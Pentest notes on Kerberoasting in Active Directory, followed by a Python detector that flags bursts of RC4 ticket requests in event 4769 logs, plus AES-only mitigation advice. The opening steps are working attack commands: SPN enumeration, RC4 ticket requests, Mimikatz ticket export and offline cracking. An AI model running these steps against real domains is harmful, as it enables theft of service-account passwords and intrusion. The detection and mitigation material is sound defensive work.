Internal Infrastructure Pentest - Kerberoasting
- First, purge all existing Kerberos tickets and confirm the cache is empty:
- `klist purge`
- `klist`
- Scan for SPNs to enumerate service accounts:
- `setspn -T domain_name -F -Q */*`
- Request a service ticket (TGS) for the target SPN; the ticket returned should use the RC4 encryption type:
- `Add-Type -AssemblyName System.IdentityModel`
- `New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPN Account'`
- `klist`
- Export the Kerberos tickets with Mimikatz:
- `mimikatz # kerberos::list /export`
- Copy the exported service ticket (`.kirbi`) to Kali for offline kerberoasting; whether the password is recovered depends on the wordlist containing it:
- `./tgsrepcrack.py wordlist.txt ticket_name.kirbi`
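Seen from the defending side, the RC4 service-ticket request in the steps above leaves a footprint: every TGS request is logged on the domain controller as Security event 4769 together with its TicketEncryptionType, and one account requesting RC4 (0x17) tickets for several distinct service accounts within a short window is the classic signature of this technique. The Python below is an added example, not code from the original post or from any tool it names: it parses a handful of constructed 4769 records (accounts, SPNs and addresses are invented) and flags that pattern, excluding krbtgt and computer accounts (names ending in `$`), whose long random passwords make their tickets uninteresting to an attacker. The flattened key=value log format is an assumption made for the example, not the native event layout.

```python
"""Flag Kerberoasting-style behaviour in Windows Security event 4769 records."""
from collections import defaultdict
from datetime import datetime, timedelta

# In event 4769 the TicketEncryptionType field is 0x17 for RC4-HMAC and
# 0x12 for AES256-CTS-HMAC-SHA1-96; RC4 tickets are the ones an attacker
# can realistically crack offline, so they are the ones worth counting.
RC4_HMAC = 0x17

# Constructed sample 4769/4768 records, flattened to one key=value line each.
# Accounts, service names and addresses are invented for this example.
SAMPLE_LOG = """\
2024-05-01T10:00:01 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.5
2024-05-01T10:00:02 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_http TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.5
2024-05-01T10:00:03 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.5
2024-05-01T10:00:04 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=WS01$ TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.5
2024-05-01T10:00:05 EventID=4769 TargetUserName=asmith@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.9
2024-05-01T10:00:06 EventID=4769 TargetUserName=asmith@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.9
2024-05-01T10:00:07 EventID=4768 TargetUserName=asmith@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.9
2024-05-01T11:30:00 EventID=4769 TargetUserName=bwong@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.21
2024-05-01T11:45:00 EventID=4769 TargetUserName=bwong@CORP.LOCAL ServiceName=svc_http TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.21
2024-05-01T12:10:00 EventID=4769 TargetUserName=bwong@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.21
"""


def parse_event(line):
    """Parse one flattened event line into a dict with typed time/ID/enc fields."""
    timestamp, *fields = line.split()
    event = dict(field.split("=", 1) for field in fields)
    event["time"] = datetime.fromisoformat(timestamp)
    event["EventID"] = int(event["EventID"])
    event["TicketEncryptionType"] = int(event["TicketEncryptionType"], 16)
    return event


def is_roastable_request(event):
    """True for a successful (Status 0x0) RC4 TGS request to a user-owned service.

    krbtgt and computer accounts (trailing '$') have long random passwords,
    so their tickets are excluded to keep the signal focused on weak accounts.
    """
    if event["EventID"] != 4769 or event["Status"] != "0x0":
        return False
    if event["TicketEncryptionType"] != RC4_HMAC:
        return False
    service = event["ServiceName"]
    return service.lower() != "krbtgt" and not service.endswith("$")


def detect_kerberoasting(log_text, threshold=3, window=timedelta(minutes=5)):
    """Return {requesting_account: sorted service names} for every account that
    obtained RC4 tickets for at least `threshold` distinct services within `window`."""
    by_account = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            event = parse_event(line)
            if is_roastable_request(event):
                by_account[event["TargetUserName"]].append(event)

    findings = {}
    for account, events in by_account.items():
        events.sort(key=lambda e: e["time"])
        flagged = set()
        # Slide a window starting at each request; count distinct services inside it.
        for i, start in enumerate(events):
            in_window = {e["ServiceName"] for e in events[i:]
                         if e["time"] - start["time"] <= window}
            if len(in_window) >= threshold:
                flagged |= in_window
        if flagged:
            findings[account] = sorted(flagged)
    return findings


if __name__ == "__main__":
    for account, services in detect_kerberoasting(SAMPLE_LOG).items():
        print(f"possible kerberoasting by {account}: {', '.join(services)}")
```

In the sample, only jdoe is reported: three RC4 tickets for distinct service accounts within seconds. bwong requests the same three services with RC4 but spread over forty minutes, so the default five-minute window does not fire; widening the window or lowering the threshold trades that silence for noise, which is the tuning decision this rule always comes down to. Enforcing AES-only encryption on service accounts removes the 0x17 requests altogether and is the mitigation that makes the detection redundant.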